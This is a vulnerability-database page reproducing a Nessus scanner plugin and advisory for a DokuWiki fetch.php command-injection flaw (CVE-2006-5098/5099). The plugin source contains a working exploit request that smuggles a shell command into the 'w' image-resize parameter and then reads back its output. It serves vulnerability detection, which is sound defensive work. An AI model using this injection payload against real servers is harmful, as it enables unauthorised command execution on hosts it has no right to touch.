Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
nessusThis script is Copyright (C) 2006-2022 and is owned by Tenable, Inc. or an Affiliate thereof.DOKUWIKI_FETCH_CMD_EXEC.NASL
HistorySep 29, 2006 - 12:00 a.m.

DokuWiki fetch.php Multiple Parameter imconvert Function Arbitrary Command Execution

2006-09-2900:00:00
This script is Copyright (C) 2006-2022 and is owned by Tenable, Inc. or an Affiliate thereof.
www.tenable.com
30

7.5 High

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

0.015 Low

EPSS

Percentile

87.1%

JSON

The remote host is running DokuWiki, an open source wiki application written in PHP.

The installed version of DokuWiki fails to properly sanitize input to the ‘w’ and ‘h’ parameters of the ‘lib/exe/fetch.php’ script before using it to execute a command when resizing images. An unauthenticated attacker can leverage this issue to execute arbitrary code on the remote host subject to the privileges of the web server user id.

In addition, the application reportedly does not limit the size of images when resizing them, which can be exploited to churn through CPU cycles and disk space on the affected host.

Note that successful exploitation of this issue requires that DokuWiki’s ‘imconvert’ configuration option be set; by default, it is not.

#%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#

include('deprecated_nasl_level.inc');
include('compat.inc');

if (description)
{
  script_id(22475);
  script_version("1.22");
  script_set_attribute(attribute:"plugin_modification_date", value:"2022/04/11");

  script_cve_id("CVE-2006-5098", "CVE-2006-5099");
  script_bugtraq_id(20257);

  script_name(english:"DokuWiki fetch.php Multiple Parameter imconvert Function Arbitrary Command Execution");

  script_set_attribute(attribute:"synopsis", value:
"The remote web server contains a PHP script that is affected by
multiple vulnerabilities.");
  script_set_attribute(attribute:"description", value:
"The remote host is running DokuWiki, an open source wiki application
written in PHP.

The installed version of DokuWiki fails to properly sanitize input to
the 'w' and 'h' parameters of the 'lib/exe/fetch.php' script before
using it to execute a command when resizing images.  An
unauthenticated attacker can leverage this issue to execute arbitrary
code on the remote host subject to the privileges of the web server
user id.

In addition, the application reportedly does not limit the size of
images when resizing them, which can be exploited to churn through CPU
cycles and disk space on the affected host.

Note that successful exploitation of this issue requires that
DokuWiki's 'imconvert' configuration option be set; by default, it is
not.");
  script_set_attribute(attribute:"see_also", value:"http://bugs.splitbrain.org/?do=details&id=924");
  script_set_attribute(attribute:"see_also", value:"http://bugs.splitbrain.org/?do=details&id=926");
  script_set_attribute(attribute:"see_also", value:"http://www.freelists.org/archives/dokuwiki/09-2006/msg00278.html");
  script_set_attribute(attribute:"solution", value:
"Upgrade to DokuWiki release 2006-03-09e / 2006-09-28 or later.");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
  script_set_cvss_temporal_vector("CVSS2#E:F/RL:OF/RC:C");
  script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H");

  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");
  script_set_attribute(attribute:"exploited_by_nessus", value:"true");

  script_set_attribute(attribute:"vuln_publication_date", value:"2006/09/26");
  script_set_attribute(attribute:"plugin_publication_date", value:"2006/09/29");

  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:andreas_gohr:dokuwiki");
  script_set_attribute(attribute:"thorough_tests", value:"true");
  script_end_attributes();

  script_category(ACT_DESTRUCTIVE_ATTACK);
  script_family(english:"CGI abuses");

  script_copyright(english:"This script is Copyright (C) 2006-2022 and is owned by Tenable, Inc. or an Affiliate thereof.");

  script_dependencies("dokuwiki_detect.nasl");
  script_require_keys("www/dokuwiki");
  script_exclude_keys("Settings/disable_cgi_scanning");
  script_require_ports("Services/www", 80);

  exit(0);
}


include("audit.inc");
include("global_settings.inc");
include("misc_func.inc");
include("http.inc");
include("webapp_func.inc");
include("data_protection.inc");

port = get_http_port(default:80, php:1);


# Test an install.
i = get_install_from_kb(appname: "dokuwiki", port: port, exit_on_fail: 1);
dir = i['dir'];

  # Try to exploit the flaw to run a command.
  cmd = "id";
  fname = string(SCRIPT_NAME, "-", unixtime(), ".html");
  u = string(
      dir, "/lib/exe/fetch.php?",
      "media=wiki:dokuwiki-128.png&",
      "w=1;", cmd, ">../../data/cache/", fname, ";exit;"
    );
  r = http_send_recv3(port:port, method: "GET", item: u, exit_on_fail: 1);

  # If it looks like the exploit was successful...
  if (" bad permissions?" >< r[2])
  {
    # Retrieve the output of the command.
    u = string(dir, "/data/cache/", fname);
    r = http_send_recv3(port: port, method: "GET", item: u, exit_on_fail: 1);

    # There's a problem if the output looks like it's from id.
    if (egrep(pattern:"uid=[0-9]+.*gid=[0-9]+.*", string: r[2]))
    {
      if (report_verbosity)
        report = strcat('\nNessus was able to execute the command \'', cmd,
	'\' on the remote host\n',
	'which produced the following output :\n\n',
          data_protection::sanitize_uid(output:r[2])    );
      else report = NULL;

      security_hole(port:port, extra: report);
      exit(0);
    }
  }
VendorProductVersionCPE
andreas_gohrdokuwikicpe:/a:andreas_gohr:dokuwiki

Related

openvas 4
nessus 2
gentoo 1
freebsd 1
debiancve 2
ubuntucve 2
cve 2
nvd 2
cvelist 2
openvas
openvas
Gentoo Security Advisory GLSA 200609-20 (dokuwiki)
2008-09-24 00:00:00
FreeBSD Ports: dokuwiki
2008-09-04 00:00:00
Gentoo Security Advisory GLSA 200609-20 (dokuwiki)
2008-09-24 00:00:00
nessus
nessus
GLSA-200609-20 : DokuWiki: Shell command injection and Denial of Service
2006-09-29 00:00:00
FreeBSD : dokuwiki -- multiple vulnerabilities (450b76ee-5068-11db-a5ae-00508d6a62df)
2006-10-02 00:00:00
gentoo
gentoo
DokuWiki: Shell command injection and Denial of service
2006-09-28 00:00:00
freebsd
freebsd
dokuwiki -- multiple vulnerabilities
2006-09-26 00:00:00
debiancve
debiancve
CVE-2006-5098
2006-09-29 23:07:00
CVE-2006-5099
2006-09-29 23:07:00
ubuntucve
ubuntucve
CVE-2006-5098
2006-09-29 00:00:00
CVE-2006-5099
2006-09-29 00:00:00
cve
cve
CVE-2006-5099
2006-09-29 23:07:00
CVE-2006-5098
2006-09-29 23:07:00
nvd
nvd
CVE-2006-5099
2006-09-29 23:07:00
CVE-2006-5098
2006-09-29 23:07:00
cvelist
cvelist
CVE-2006-5098
2006-09-29 23:00:00
CVE-2006-5099
2006-09-29 23:00:00

7.5 High

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

0.015 Low

EPSS

Percentile

87.1%

JSON
Related for DOKUWIKI_FETCH_CMD_EXEC.NASL
openvas4nessus2gentoo1freebsd1debiancve2ubuntucve2cve2nvd2cvelist2